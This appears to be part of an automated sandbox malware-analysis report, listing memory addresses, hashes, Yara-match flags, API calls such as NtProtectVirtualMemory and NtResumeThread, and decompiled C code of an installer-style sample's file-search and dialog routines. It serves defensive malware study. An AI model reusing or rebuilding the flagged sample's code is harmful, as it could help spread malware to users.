                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00000000
                                                                                    0x0040753b
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                    • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                    • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                    • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339BB26 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0339DB0F: LoadLibraryA.KERNELBASE(2A299079), ref: 0339DBDE
                                                                                    • LdrInitializeThunk.NTDLL ref: 0339C3C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeLibraryLoadThunk
                                                                                    • String ID: {P-
                                                                                    • API String ID: 3353482560-3462336082
                                                                                    • Opcode ID: 17abb99d0fe79ba59fd914939e67d9797cbbd8c1abb069aa1579ee9c3b7dca28
                                                                                    • Instruction ID: 0aa9e640eabf4d103d75b51190ad0cddc0dd7ca9abd9ba1b29b3d005fed0fe51
                                                                                    • Opcode Fuzzy Hash: 17abb99d0fe79ba59fd914939e67d9797cbbd8c1abb069aa1579ee9c3b7dca28
                                                                                    • Instruction Fuzzy Hash: 0D21BBB5608249DFEF05EF30C8C25DE7B66DF15210F28805BDC459B686DE348802CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                                                    0x004069a9
                                                                                    0x004069b2
                                                                                    0x00000000
                                                                                    0x004069bf
                                                                                    0x004069b5
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4!u.!u,?,75212EE0,00405D94,?,75213420,75212EE0), ref: 004069A9
                                                                                    • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                    • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                    • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                    • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03398B95 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff01915f37b0548c99939a49cd13d2340d60e23bb4317fdde7971c4059ac009c
                                                                                    • Instruction ID: f7df17baf6139885adce7bc5afbcff2ac5ddeaef9f8dd5dc862479fd9402e8a9
                                                                                    • Opcode Fuzzy Hash: ff01915f37b0548c99939a49cd13d2340d60e23bb4317fdde7971c4059ac009c
                                                                                    • Instruction Fuzzy Hash: 5651BA76601345CFEF25CF29C9C57DAB7A6AF96310F59816ACC0A9F625C3348A41CB11
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339CE66 Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(03392CA0), ref: 0339D17A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 9155acd86195a1d947d654751239750062f2bfba15919e41380d898c7b8b0c0e
                                                                                    • Instruction ID: 900ab2157f0b394c2514071524001024adf581684c6d3337eb3c04352119af55
                                                                                    • Opcode Fuzzy Hash: 9155acd86195a1d947d654751239750062f2bfba15919e41380d898c7b8b0c0e
                                                                                    • Instruction Fuzzy Hash: 9E21B377508354DBFF649E398D856EEB7BAEF98320F02051F9C8797A24D3300A428756
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 033A00DF Relevance: 1.5, APIs: 1, Instructions: 47nativethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(00000001,033A06C2), ref: 033A02C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 3ac9fe8645e7cde7e7ce43bb7197cb5bb5dd79c457973e5413053244bd38a2aa
                                                                                    • Instruction ID: 6db72d82f41df92c969b65ca808d393132fd7dae8a273c34a93e5eed7d74912d
                                                                                    • Opcode Fuzzy Hash: 3ac9fe8645e7cde7e7ce43bb7197cb5bb5dd79c457973e5413053244bd38a2aa
                                                                                    • Instruction Fuzzy Hash: 5D017C35608B45CFDF2DDE6CCAD53ED336AFB89344F204436C9878BA44D73999458A02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0339FC0D Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL ref: 0339FCAC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0
                                                                                    • Opcode ID: 42b4aee13921d51d8c2b56880599394467a66a6fb7e9a876f491b35a729639c6
                                                                                    • Instruction ID: ed76ba45cd7f2d30de4c9c4cfaafa132ea52ddeb5d611f3dc78f95cb607b8c7b
                                                                                    • Opcode Fuzzy Hash: 42b4aee13921d51d8c2b56880599394467a66a6fb7e9a876f491b35a729639c6
                                                                                    • Instruction Fuzzy Hash: 74F03C76608244CFEB30DE29CC809EEB7AAEFD8300F55842E99999B604C7706E41CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 41%
                                                                                    			E0040290B(short __ebx, short* __edi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
				if(_t8 != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}





                                                                                    0x0040291a
                                                                                    0x00402923
                                                                                    0x0040293e
                                                                                    0x00402949
                                                                                    0x0040294a
                                                                                    0x00402a94
                                                                                    0x00402925
                                                                                    0x00402928
                                                                                    0x0040292b
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: d172b7d3e83c269294ff2efff8cf0104f60b0a4ac084fd7c0d24acf0b4e06745
                                                                                    • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                    • Opcode Fuzzy Hash: d172b7d3e83c269294ff2efff8cf0104f60b0a4ac084fd7c0d24acf0b4e06745
                                                                                    • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 197 4040e9-4040f2 195->197 198 40429c-4042b1 196->198 199 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 196->199 200 4040f4-404101 SetWindowPos 197->200 201 404107-40410e 197->201 203 4042f1-4042f6 call 404610 198->203 204 4042b3-4042b6 198->204 199->198 200->201 206 404110-40412a ShowWindow 201->206 207 404152-404158 201->207 213 4042fb-404316 203->213 209 4042b8-4042c3 call 401389 204->209 210 4042e9-4042eb 204->210 214 404130-404143 GetWindowLongW 206->214 215 40422b-404239 call 40462b 206->215 216 404171-404174 207->216 217 40415a-40416c DestroyWindow 207->217 209->210 229 4042c5-4042e4 SendMessageW 209->229 210->203 212 404591 210->212 224 404593-40459a 212->224 221 404318-40431a call 40140b 213->221 222 40431f-404325 213->222 214->215 223 404149-40414c ShowWindow 214->223 215->224 227 404176-404182 SetWindowLongW 216->227 228 404187-40418d 216->228 225 40456e-404574 217->225 221->222 233 40432b-404336 222->233 234 40454f-404568 DestroyWindow EndDialog 222->234 223->207 225->212 232 404576-40457c 225->232 227->224 228->215 235 404193-4041a2 GetDlgItem 228->235 229->224 232->212 238 40457e-404587 ShowWindow 232->238 233->234 239 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 233->239 234->225 236 4041c1-4041c4 235->236 237 4041a4-4041bb SendMessageW IsWindowEnabled 235->237 240 4041c6-4041c7 236->240 241 4041c9-4041cc 236->241 237->212 237->236 238->212 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 239->266 267 40438b-404390 239->267 243 4041f7-4041fc call 40459d 240->243 244 4041da-4041df 241->244 245 4041ce-4041d4 241->245 243->215 247 404215-404225 SendMessageW 244->247 249 4041e1-4041e7 244->249 245->247 248 4041d6-4041d8 245->248 247->215 248->243 252 4041e9-4041ef call 40140b 249->252 253 4041fe-404207 call 40140b 249->253 264 4041f5 252->264 253->215 262 404209-404213 253->262 262->264 264->243 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->213 286 404464-404466 275->286 286->213 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->212 290 40447e-404484 288->290 289->225 291 4044a9-4044d6 CreateDialogParamW 289->291 290->213 292 40448a 290->292 291->225 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->212 293->212 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->225
                                                                                    C-Code - Quality: 86%
                                                                                    			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238); // executed
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8); // executed
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
